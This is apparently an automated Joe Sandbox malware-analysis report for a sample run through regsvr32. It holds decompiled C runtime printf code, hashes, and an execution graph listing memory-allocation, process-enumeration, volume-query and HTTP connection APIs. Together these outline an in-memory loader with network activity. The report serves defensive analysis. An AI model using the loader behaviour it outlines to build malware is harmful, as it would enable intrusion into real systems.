                                                                                			E00007FFA7FFA5247E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t213;
				signed char _t218;
				void* _t249;
				intOrPtr _t257;
				signed int _t331;
				signed int _t332;
				signed long long _t335;
				intOrPtr* _t354;
				intOrPtr* _t359;
				signed long long _t389;

				_t331 = __rax;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0x5247e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0x5247e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0x5247e797;
				E00007FFA7FFA52471EA0( &_a1560);
				_a1304 = _t331;
				goto 0x5247e844;
				if ((_a80 & 0x00001000) == 0) goto 0x5247e7be;
				E00007FFA7FFA52471EA0( &_a1560);
				_a1304 = _t331;
				goto 0x5247e844;
				if ((_a80 & 0x00000020) == 0) goto 0x5247e809;
				if ((_a80 & 0x00000040) == 0) goto 0x5247e7ef;
				_t332 = E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t332;
				goto 0x5247e807;
				E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t332;
				goto 0x5247e844;
				if ((_a80 & 0x00000040) == 0) goto 0x5247e82d;
				E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t332;
				goto 0x5247e844;
				E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t332;
				if ((_a80 & 0x00000040) == 0) goto 0x5247e87b;
				if (_a1304 >= 0) goto 0x5247e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0x5247e88b;
				_t335 = _a1304;
				_a1312 = _t335;
				if ((_a80 & 0x00008000) != 0) goto 0x5247e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0x5247e8c0;
				_a1312 = _a1312 & _t335;
				if (_a116 >= 0) goto 0x5247e8d1;
				_a116 = 1;
				goto 0x5247e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0x5247e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0x5247e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t213 = _a116;
				_a116 = _a116 - 1;
				if (_t213 > 0) goto 0x5247e92f;
				if (_a1312 == 0) goto 0x5247e9cc;
				_a1480 = _a72;
				_a1296 = _t213 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0x5247e9ab;
				_t218 = _a1296 + _a1220;
				_a1296 = _t218;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0x5247e90e;
				_a104 = _t218;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0x5247ea2a;
				if (_a104 == 0) goto 0x5247ea0b;
				if ( *_a64 == 0x30) goto 0x5247ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0x5247ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0x5247ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0x5247ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0x5247ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0x5247ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0x5247ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0x5247ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0x5247eadf;
				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
				E00007FFA7FFA5247EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0x5247eb33;
				if ((_a80 & 0x00000004) != 0) goto 0x5247eb33;
				E00007FFA7FFA5247EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0x5247ec29;
				if (_a104 <= 0) goto 0x5247ec29;
				_t354 = _a64;
				_a1328 = _t354;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0x5247ec27;
				_t249 = E00007FFA7FFA52466840(_a1336,  &_a120);
				_a1496 = _t354;
				E00007FFA7FFA52466840(_t249,  &_a120);
				_a1340 = E00007FFA7FFA5247F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0x5247ebe7;
				_a1200 = 0xffffffff;
				goto 0x5247ec27;
				E00007FFA7FFA5247EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0x5247eb61;
				goto 0x5247ec47;
				E00007FFA7FFA5247EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0x5247ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0x5247ec7c;
				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0x5247ec9c;
				0x52465330();
				_a96 = 0;
				goto 0x5247da75;
				if (_a1216 == 0) goto 0x5247ecc2;
				if (_a1216 == 7) goto 0x5247ecc2;
				_a1504 = 0;
				goto 0x5247eccd;
				_a1504 = 1;
				_t257 = _a1504;
				_a1344 = _t257;
				if (_a1344 != 0) goto 0x5247ed13;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0x5246b3b0();
				if (_t257 != 1) goto 0x5247ed13;
				asm("int3");
				if (_a1344 != 0) goto 0x5247ed6f;
				0x5246ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E00007FFA7FFA52466800( &_a120);
				goto 0x5247ed8e;
				_a1380 = _a1200;
				E00007FFA7FFA52466800( &_a120);
				return E00007FFA7FFA52463280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                                                                0x7ffa5247e70c
                                                                                0x7ffa5247e70c
                                                                                0x7ffa5247e717
                                                                                0x7ffa5247e72a
                                                                                0x7ffa5247e731
                                                                                0x7ffa5247e740
                                                                                0x7ffa5247e745
                                                                                0x7ffa5247e74f
                                                                                0x7ffa5247e762
                                                                                0x7ffa5247e768
                                                                                0x7ffa5247e77b
                                                                                0x7ffa5247e785
                                                                                0x7ffa5247e78a
                                                                                0x7ffa5247e792
                                                                                0x7ffa5247e7a2
                                                                                0x7ffa5247e7ac
                                                                                0x7ffa5247e7b1
                                                                                0x7ffa5247e7b9
                                                                                0x7ffa5247e7c7
                                                                                0x7ffa5247e7d2
                                                                                0x7ffa5247e7e1
                                                                                0x7ffa5247e7e5
                                                                                0x7ffa5247e7ed
                                                                                0x7ffa5247e7f7
                                                                                0x7ffa5247e7ff
                                                                                0x7ffa5247e807
                                                                                0x7ffa5247e812
                                                                                0x7ffa5247e81c
                                                                                0x7ffa5247e823
                                                                                0x7ffa5247e82b
                                                                                0x7ffa5247e835
                                                                                0x7ffa5247e83c
                                                                                0x7ffa5247e84d
                                                                                0x7ffa5247e858
                                                                                0x7ffa5247e865
                                                                                0x7ffa5247e871
                                                                                0x7ffa5247e879
                                                                                0x7ffa5247e87b
                                                                                0x7ffa5247e883
                                                                                0x7ffa5247e896
                                                                                0x7ffa5247e8a3
                                                                                0x7ffa5247e8b8
                                                                                0x7ffa5247e8c5
                                                                                0x7ffa5247e8c7
                                                                                0x7ffa5247e8cf
                                                                                0x7ffa5247e8d8
                                                                                0x7ffa5247e8e4
                                                                                0x7ffa5247e8e6
                                                                                0x7ffa5247e8f7
                                                                                0x7ffa5247e8f9
                                                                                0x7ffa5247e909
                                                                                0x7ffa5247e90e
                                                                                0x7ffa5247e918
                                                                                0x7ffa5247e91e
                                                                                0x7ffa5247e929
                                                                                0x7ffa5247e934
                                                                                0x7ffa5247e957
                                                                                0x7ffa5247e963
                                                                                0x7ffa5247e990
                                                                                0x7ffa5247e9a2
                                                                                0x7ffa5247e9a4
                                                                                0x7ffa5247e9b8
                                                                                0x7ffa5247e9c2
                                                                                0x7ffa5247e9c7
                                                                                0x7ffa5247e9d9
                                                                                0x7ffa5247e9e5
                                                                                0x7ffa5247e9f5
                                                                                0x7ffa5247e9fc
                                                                                0x7ffa5247ea09
                                                                                0x7ffa5247ea13
                                                                                0x7ffa5247ea1d
                                                                                0x7ffa5247ea26
                                                                                0x7ffa5247ea2f
                                                                                0x7ffa5247ea3e
                                                                                0x7ffa5247ea4b
                                                                                0x7ffa5247ea52
                                                                                0x7ffa5247ea57
                                                                                0x7ffa5247ea5f
                                                                                0x7ffa5247ea6a
                                                                                0x7ffa5247ea71
                                                                                0x7ffa5247ea76
                                                                                0x7ffa5247ea7e
                                                                                0x7ffa5247ea89
                                                                                0x7ffa5247ea90
                                                                                0x7ffa5247ea95
                                                                                0x7ffa5247eaad
                                                                                0x7ffa5247eabd
                                                                                0x7ffa5247eada
                                                                                0x7ffa5247eaf8
                                                                                0x7ffa5247eb06
                                                                                0x7ffa5247eb11
                                                                                0x7ffa5247eb2e
                                                                                0x7ffa5247eb38
                                                                                0x7ffa5247eb43
                                                                                0x7ffa5247eb49
                                                                                0x7ffa5247eb4e
                                                                                0x7ffa5247eb5a
                                                                                0x7ffa5247eb71
                                                                                0x7ffa5247eb7a
                                                                                0x7ffa5247eb85
                                                                                0x7ffa5247eb8a
                                                                                0x7ffa5247eb97
                                                                                0x7ffa5247ebc9
                                                                                0x7ffa5247ebd8
                                                                                0x7ffa5247ebda
                                                                                0x7ffa5247ebe5
                                                                                0x7ffa5247ebff
                                                                                0x7ffa5247ec1a
                                                                                0x7ffa5247ec22
                                                                                0x7ffa5247ec27
                                                                                0x7ffa5247ec42
                                                                                0x7ffa5247ec4f
                                                                                0x7ffa5247ec5a
                                                                                0x7ffa5247ec77
                                                                                0x7ffa5247ec82
                                                                                0x7ffa5247ec8e
                                                                                0x7ffa5247ec93
                                                                                0x7ffa5247ec9c
                                                                                0x7ffa5247eca9
                                                                                0x7ffa5247ecb3
                                                                                0x7ffa5247ecb5
                                                                                0x7ffa5247ecc0
                                                                                0x7ffa5247ecc2
                                                                                0x7ffa5247eccd
                                                                                0x7ffa5247ecd4
                                                                                0x7ffa5247ece3
                                                                                0x7ffa5247ece5
                                                                                0x7ffa5247ecec
                                                                                0x7ffa5247ecf1
                                                                                0x7ffa5247ecf4
                                                                                0x7ffa5247ed06
                                                                                0x7ffa5247ed0e
                                                                                0x7ffa5247ed10
                                                                                0x7ffa5247ed1b
                                                                                0x7ffa5247ed1d
                                                                                0x7ffa5247ed22
                                                                                0x7ffa5247ed28
                                                                                0x7ffa5247ed31
                                                                                0x7ffa5247ed4c
                                                                                0x7ffa5247ed51
                                                                                0x7ffa5247ed61
                                                                                0x7ffa5247ed6d
                                                                                0x7ffa5247ed76
                                                                                0x7ffa5247ed82
                                                                                0x7ffa5247eda5

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: '$9
                                                                                • API String ID: 1967237116-1823400153
                                                                                • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                • Instruction ID: 8a667b30d747ca4a9982cd1de88f5bca883b3039c16f9becd1da5126e3d560cd
                                                                                • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                • Instruction Fuzzy Hash: 5041FA3260DAC586E7748B19E8403ABB3F4FB86341F088525E69CC7B98EBBCD4418F04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247D710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock
                                                                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                                                • API String ID: 2480363372-1749241151
                                                                                • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                • Instruction ID: 3cf63ea4251f4fcb46b05a9f75b2e9a005ce6a1309fe0346c569ec2d1b29c386
                                                                                • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                • Instruction Fuzzy Hash: 06113036A38A86C6EB649B18D84162963F1FBC6750F089035E65D47B98CFBCE445CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52481200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                                                • String ID: csm
                                                                                • API String ID: 1826589669-1018135373
                                                                                • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                • Instruction ID: dc5cabcb24ff0b13e4513880aa9c24e26a8bb81d7c148fab24ac8e9ba852b650
                                                                                • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                • Instruction Fuzzy Hash: E3115132954682CADF60DF75D8801B927F0FB96B84F589532EA1E4B7A9CF64E981C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246F3E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _free_nolock
                                                                                • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                                                • API String ID: 2882679554-3458198949
                                                                                • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                • Instruction ID: eeecd72c6780815783a1fae5c48eb349e963c9509e79177bfa487a3189f7f6a0
                                                                                • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                • Instruction Fuzzy Hash: C7012121A2C78286EB509B64E88472AA3F0F791390F448535EA8D42F9DDFFCF4048B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:15.7%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:4%
                                                                                Total number of Nodes:101
                                                                                Total number of Limit Nodes:11
                                                                                execution_graph 4060 1800178f4 4063 18000ffc0 4060->4063 4062 180017924 4068 18001000e 4063->4068 4067 1800116b2 4067->4062 4068->4067 4071 180015774 4068->4071 4075 1800078a4 4068->4075 4079 18002975c 4068->4079 4083 180007eb4 4068->4083 4087 18001667c 4068->4087 4073 1800157bd 4071->4073 4074 1800157fb 4073->4074 4095 1800027f8 4073->4095 4074->4068 4078 1800078c0 4075->4078 4077 1800079e2 4077->4068 4078->4077 4102 18001705c 4078->4102 4081 1800297af 4079->4081 4082 180029f99 4081->4082 4113 18000c758 4081->4113 4082->4068 4084 180007ee1 4083->4084 4086 180008118 4084->4086 4129 180011ef8 4084->4129 4086->4068 4088 1800166ac 4087->4088 4092 180016ad3 4088->4092 4132 180023624 4088->4132 4136 180018bdc 4088->4136 4140 18000bc98 4088->4140 4144 18001aec8 4088->4144 4148 1800270c0 4088->4148 4092->4068 4098 180006f2c 4095->4098 4097 18000289c 4097->4073 4099 180006f5d 4098->4099 4100 180007250 Process32NextW 4099->4100 4101 180006fbc 4099->4101 4100->4099 4101->4097 4104 18001707b 4102->4104 4105 1800172eb 4104->4105 4106 180028348 4104->4106 4105->4078 4107 180028431 4106->4107 4108 180028607 4107->4108 4110 180017bf8 4107->4110 4108->4104 4111 180017c7c 4110->4111 4112 180017d21 GetVolumeInformationW 4111->4112 4112->4108 4119 18000c7dc 4113->4119 4114 18000c9b5 4120 18002446c 4114->4120 4116 18000c84b 4116->4081 4119->4114 4119->4116 4123 1800149cc 4119->4123 4126 180016500 4119->4126 4121 1800244af 4120->4121 4122 180024558 InternetOpenW 4121->4122 4122->4116 4125 180014a4c 4123->4125 4124 180014ae5 HttpOpenRequestW 4124->4119 4125->4124 4128 18001657b 4126->4128 4127 18001663c InternetConnectW 4127->4119 4128->4127 4131 180011f57 4129->4131 4130 180012017 CreateThread 4130->4086 4131->4130 4135 180023662 4132->4135 4133 180023683 4133->4088 4135->4133 4152 180018628 4135->4152 4138 180018c18 4136->4138 4137 180011ef8 CreateThread 4137->4138 4138->4137 4139 180018f32 4138->4139 4139->4088 4142 18000bcde 4140->4142 4141 18000c521 4141->4088 4142->4141 4143 180018628 CreateFileW 4142->4143 4143->4142 4146 18001aef6 4144->4146 4145 180011ef8 CreateThread 4145->4146 4146->4145 4147 18001b239 4146->4147 4147->4088 4150 180027157 4148->4150 4149 180027fe1 4149->4088 4150->4149 4151 180018628 CreateFileW 4150->4151 4151->4150 4153 180018660 4152->4153 4155 180018943 4153->4155 4156 18001bf0c 4153->4156 4155->4135 4158 18001bf8e 4156->4158 4157 18001c031 CreateFileW 4157->4153 4158->4157 4159 180011ef8 4161 180011f57 4159->4161 4160 180012017 CreateThread 4161->4160 4162 180018628 4163 180018660 4162->4163 4164 18001bf0c CreateFileW 4163->4164 4165 180018943 4163->4165 4164->4163 4166 570000 4167 570183 4166->4167 4168 57043e VirtualAlloc 4167->4168 4172 570462 4168->4172 4169 570531 GetNativeSystemInfo 4170 57056d VirtualAlloc 4169->4170 4174 570a7b 4169->4174 4171 57058b 4170->4171 4173 570a00 4171->4173 4176 5709d9 VirtualProtect 4171->4176 4172->4169 4172->4174 4173->4174 4175 570a56 RtlAddFunctionTable 4173->4175 4175->4174 4176->4171 4177 18000c819 4181 18000c80c 4177->4181 4178 18000c9b5 4179 18002446c InternetOpenW 4178->4179 4183 18000c84b 4179->4183 4180 1800149cc HttpOpenRequestW 4180->4181 4181->4177 4181->4178 4181->4180 4182 180016500 InternetConnectW 4181->4182 4181->4183 4182->4181

                                                                                Executed Functions

                                                                                Function 00570000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 570000-570460 call 570aa8 * 2 VirtualAlloc 22 570462-570466 0->22 23 57048a-570494 0->23 24 570468-570488 22->24 26 570a91-570aa6 23->26 27 57049a-57049e 23->27 24->23 24->24 27->26 28 5704a4-5704a8 27->28 28->26 29 5704ae-5704b2 28->29 29->26 30 5704b8-5704bf 29->30 30->26 31 5704c5-5704d2 30->31 31->26 32 5704d8-5704e1 31->32 32->26 33 5704e7-5704f4 32->33 33->26 34 5704fa-570507 33->34 35 570531-570567 GetNativeSystemInfo 34->35 36 570509-570511 34->36 35->26 37 57056d-570589 VirtualAlloc 35->37 38 570513-570518 36->38 39 5705a0-5705ac 37->39 40 57058b-57059e 37->40 41 570521 38->41 42 57051a-57051f 38->42 43 5705af-5705b2 39->43 40->39 44 570523-57052f 41->44 42->44 46 5705b4-5705bf 43->46 47 5705c1-5705db 43->47 44->35 44->38 46->43 48 5705dd-5705e2 47->48 49 57061b-570622 47->49 50 5705e4-5705ea 48->50 51 5706db-5706e2 49->51 52 570628-57062f 49->52 53 5705ec-570609 50->53 54 57060b-570619 50->54 56 570864-57086b 51->56 57 5706e8-5706f9 51->57 52->51 55 570635-570642 52->55 53->53 53->54 54->49 54->50 55->51 61 570648-57064f 55->61 59 570917-570929 56->59 60 570871-57087f 56->60 58 570702-570705 57->58 63 570707-57070a 58->63 64 5706fb-5706ff 58->64 65 570a07-570a1a 59->65 66 57092f-570937 59->66 67 57090e-570911 60->67 62 570654-570658 61->62 68 5706c0-5706ca 62->68 69 57070c-57071d 63->69 70 570788-57078e 63->70 64->58 87 570a40-570a4a 65->87 88 570a1c-570a27 65->88 72 57093b-57093f 66->72 67->59 71 570884-5708a9 67->71 76 5706cc-5706d2 68->76 77 57065a-570669 68->77 73 570794-5707a2 69->73 74 57071f-570720 69->74 70->73 92 570907-57090c 71->92 93 5708ab-5708b1 71->93 78 570945-57095a 72->78 79 5709ec-5709fa 72->79 89 57085d-57085e 73->89 90 5707a8 73->90 86 570722-570784 74->86 76->62 91 5706d4-5706d5 76->91 83 57066b-570678 77->83 84 57067a-57067e 77->84 81 57095c-57095e 78->81 82 57097b-57097d 78->82 79->72 85 570a00-570a01 79->85 94 570960-57096c 81->94 95 57096e-570979 81->95 97 5709a2-5709a4 82->97 98 57097f-570981 82->98 96 5706bd-5706be 83->96 99 570680-57068a 84->99 100 57068c-570690 84->100 85->65 86->86 101 570786 86->101 104 570a4c-570a54 87->104 105 570a7b-570a8e 87->105 102 570a38-570a3e 88->102 89->56 103 5707ae-5707d4 90->103 91->51 92->67 114 5708b3-5708b9 93->114 115 5708bb-5708c8 93->115 106 5709be-5709bf 94->106 95->106 96->68 112 5709a6-5709aa 97->112 113 5709ac-5709bb 97->113 107 570983-570987 98->107 108 570989-57098b 98->108 109 5706b6-5706ba 99->109 110 5706a5-5706a9 100->110 111 570692-5706a3 100->111 101->73 102->87 116 570a29-570a35 102->116 131 5707d6-5707d9 103->131 132 570835-570839 103->132 104->105 117 570a56-570a79 RtlAddFunctionTable 104->117 105->26 121 5709c5-5709cb 106->121 107->106 108->97 119 57098d-57098f 108->119 109->96 110->96 120 5706ab-5706b3 110->120 111->109 112->106 113->106 122 5708ea-5708fe 114->122 123 5708d3-5708e5 115->123 124 5708ca-5708d1 115->124 116->102 117->105 126 570991-570997 119->126 127 570999-5709a0 119->127 120->109 128 5709cd-5709d3 121->128 129 5709d9-5709e9 VirtualProtect 121->129 122->92 141 570900-570905 122->141 123->122 124->123 124->124 126->106 127->121 128->129 129->79 136 5707e3-5707f0 131->136 137 5707db-5707e1 131->137 133 570844-570850 132->133 134 57083b 132->134 133->103 140 570856-570857 133->140 134->133 138 5707f2-5707f9 136->138 139 5707fb-57080d 136->139 142 570812-57082c 137->142 138->138 138->139 139->142 140->89 141->93 142->132 144 57082e-570833 142->144 144->131
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.704097752.0000000000570000.00000040.00001000.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_570000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                • API String ID: 394283112-2517549848
                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction ID: 6fa639c0e9fa009ac563b468a8e51fbb29dee1bfae8140a8a3478c002ca4d3e7
                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction Fuzzy Hash: B572E630618B48CFDB19DF18D8856B9BBE1FB98305F10962DE88ED7251DB34E942CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00000001800248B0 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 511 1800248b0-18002490f call 18001feb0 514 180024914 511->514 515 180024916-18002491b 514->515 516 180024921-180024926 515->516 517 180024e2c-180024e96 call 18002a534 515->517 519 180024b7b-180024ba7 516->519 520 18002492c-180024931 516->520 521 180024e9b-180024e9d 517->521 524 180024e0d-180024e22 519->524 525 180024bad-180024bb2 519->525 522 180024937-18002493c 520->522 523 180024b6d-180024b76 520->523 528 180024ea9-180024eb6 521->528 529 180024e9f-180024ea4 521->529 530 180024942-180024947 522->530 531 180024ec7-180024f09 call 18001ce90 522->531 523->515 524->517 526 180024bd3-180024bd5 525->526 527 180024bb4-180024bbb 525->527 535 180024bc9-180024bce 526->535 537 180024bd7-180024da0 call 180020aa0 call 180022520 call 1800248b0 526->537 527->535 536 180024bbd-180024bc1 527->536 539 180024ebb-180024ec0 528->539 538 180024b5b-180024b68 529->538 532 180024a99-180024b44 call 18001fa00 530->532 533 18002494d-180024952 530->533 545 180024f0e-180024f26 531->545 549 180024b49-180024b50 532->549 533->539 541 180024958-180024a94 call 1800234d8 call 180001400 call 180029480 533->541 535->515 536->526 542 180024bc3-180024bc7 536->542 558 180024da5-180024e08 call 180029480 537->558 538->515 544 180024ec2 539->544 539->545 541->514 542->526 542->535 544->515 549->545 552 180024b56 549->552 552->538 558->535
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: O}$X$bW
                                                                                • API String ID: 0-980370356
                                                                                • Opcode ID: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                                • Instruction ID: a62d154362f2d503ef0efb6b3a203e4a1ee478d45050cbe1ab820923c54e17f6
